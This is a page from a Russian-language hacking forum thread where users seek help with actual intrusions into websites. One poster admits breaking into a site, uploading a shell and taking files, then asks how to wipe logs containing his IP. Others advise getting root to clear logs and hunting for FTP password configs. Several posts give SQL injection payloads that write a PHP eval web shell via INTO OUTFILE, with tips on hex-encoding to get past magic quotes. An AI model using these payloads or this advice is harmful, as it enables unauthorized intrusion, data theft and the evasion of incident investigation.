Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    53
    Likes Received:
    5
    Reputations:
    -4
    В общем, по своей дурости, сегодня взломал сайт не включив впн :(
    Залил шелл, погулял по папкам, заливал файлы, читал файлы, скачивал.

    После завершения работы естественно решил вырубить впн, но как оказалось он не был включен...

    Как мне почистить логи, особенно со своим ip?

    +++
    Если не там запостил, извините, не знал куда можно запостить.


    Эри, они вроде делали всякие скрипты, посмотри на хакер.ру, там есть какое-то скучное интервью с участником rht.
     
  2. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    980
    Likes Received:
    525
    Reputations:
    173
    бери root и чисти логи, другово не знаю не дано
     
  3. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    53
    Likes Received:
    5
    Reputations:
    -4
    Как не подскажешь?

    Версия ядра - Linux Kernel 2.6.18
     
    #20143 kise, 17 Apr 2012
    Last edited: 17 Apr 2012
  4. shadowrun

    shadowrun Banned

    Joined:
    29 Aug 2010
    Messages:
    843
    Likes Received:
    170
    Reputations:
    84
    можно что выжать?
     
  5. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    365
    Likes Received:
    188
    Reputations:
    92
    нет.

    Можешь администрации посоветовать выключить вывод ошибок.

    посмотри следующие темы:

    http://forum.antichat.ru/showthread.php?t=121272
    https://forum.antichat.ru/showthread.php?t=30711
    http://www.1337day.com/exploits/17158
     
    #20145 mix0x0, 17 Apr 2012
    Last edited: 17 Apr 2012
  6. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    566
    Likes Received:
    373
    Reputations:
    267
    Буржуйский сайт? Тогда спи спокойно.
    Котенок Кисс думает... сделав тройное сальто, говорит, что надо сказать о уязвимости админам, тогда они поблагодарят тебя, а ты спасаешь жопу. Уж блиц-то знает, с такой датой регистрации в интернете.
     
  7. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    Та мало ли, вдруг ему нужно не целые таблицы а некоторые колонки из них.

    естественно есть, а как по твоему скрипт выводит инфу из базы?
    тебе ещо раз говорят, просмотри все файлы что инклудятся в скрипте, там в какомто из них будут данные от БД
     
  8. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    маленький ввопросец, ато гугл не помог, где на сервере хранятся пароли от фтп?
     
  9. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    736
    Likes Received:
    73
    Reputations:
    19
    Смотри какой фтп серв используется, далее гугли дефолтные конфиги(пути) для него, а хитрожопый админ может засунуть и оч глубоко конфиг.
     
    1 person likes this.
  10. Mr.Snuffer

    Mr.Snuffer Member

    Joined:
    2 Jul 2010
    Messages:
    149
    Likes Received:
    13
    Reputations:
    0
    Я даже проксей не юзаю, за мной выехали? :(
     
  11. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    53
    Likes Received:
    5
    Reputations:
    -4
    Вот как то так. Что теперь мне делать?
     
  12. Mr.Snuffer

    Mr.Snuffer Member

    Joined:
    2 Jul 2010
    Messages:
    149
    Likes Received:
    13
    Reputations:
    0
    cc, gpp, cpp пробуй
     
  13. kise

    kise Member

    Joined:
    29 Jan 2012
    Messages:
    53
    Likes Received:
    5
    Reputations:
    -4
    ------------
     
  14. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    736
    Likes Received:
    73
    Reputations:
    19
    kise, тащи эти файлы с собой stdio и.т.д этих заголовочных файлов на серве нет, но судя по тому что ошибки лезут компилятор таки есть.
     
  15. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    41
    Likes Received:
    0
    Reputations:
    0
    Что можно извлечь из файла etc/passwd ато там столько всего что можно голову сломать?
     
  16. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    736
    Likes Received:
    73
    Reputations:
    19
    http://ru.wikipedia.org/wiki/Salt#.D0.A3.D1.80.D0.BE.D0.B2.D0.BD.D0.B8_.D0.B7.D0.B0.D1.89.D0.B8.D1.82.D1.8B
    И реши что именно тебе надо и надо ли вообще.
     
  17. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    41
    Likes Received:
    0
    Reputations:
    0
    Столкнулся вот с токой проблеммой,чтобы прочитать файл нужно путь к файлу представить в hex,а теперь сижу и ломаю голову а как же теперь шела залить обычным запросом +union+select+1,2,3,'<?php eval($_GET[‘e’]) ?>',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+into+outfile+'/var/www/html/azaz.html'-- не получается пробовал уже и так +union+select+1,2,3,0x3c3f706870206576616c28245f4745545be2809865e280995d29203f3e,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+into+outfile+'/var/www/html/azaz.html'--
    и даже так +union+select+1,2,3,'0x3c3f706870206576616c28245f4745545be2809865e280995d29203f3e',5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+into+outfile+'/var/www/html/azaz.html'-- ничего не выходит.Помогите пожалуйста
     
  18. Mr.Snuffer

    Mr.Snuffer Member

    Joined:
    2 Jul 2010
    Messages:
    149
    Likes Received:
    13
    Reputations:
    0
    Если это магические ковычки, то +'/var/www/html/azaz.html'- тоже хексить надо.
     
  19. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    41
    Likes Received:
    0
    Reputations:
    0
    File_priv Y а как проверить права на папку куда лить шелл?
     
  20. Mr.Snuffer

    Mr.Snuffer Member

    Joined:
    2 Jul 2010
    Messages:
    149
    Likes Received:
    13
    Reputations:
    0
    Вот дерьмо :(
     
Loading...
Thread Status:
Not open for further replies.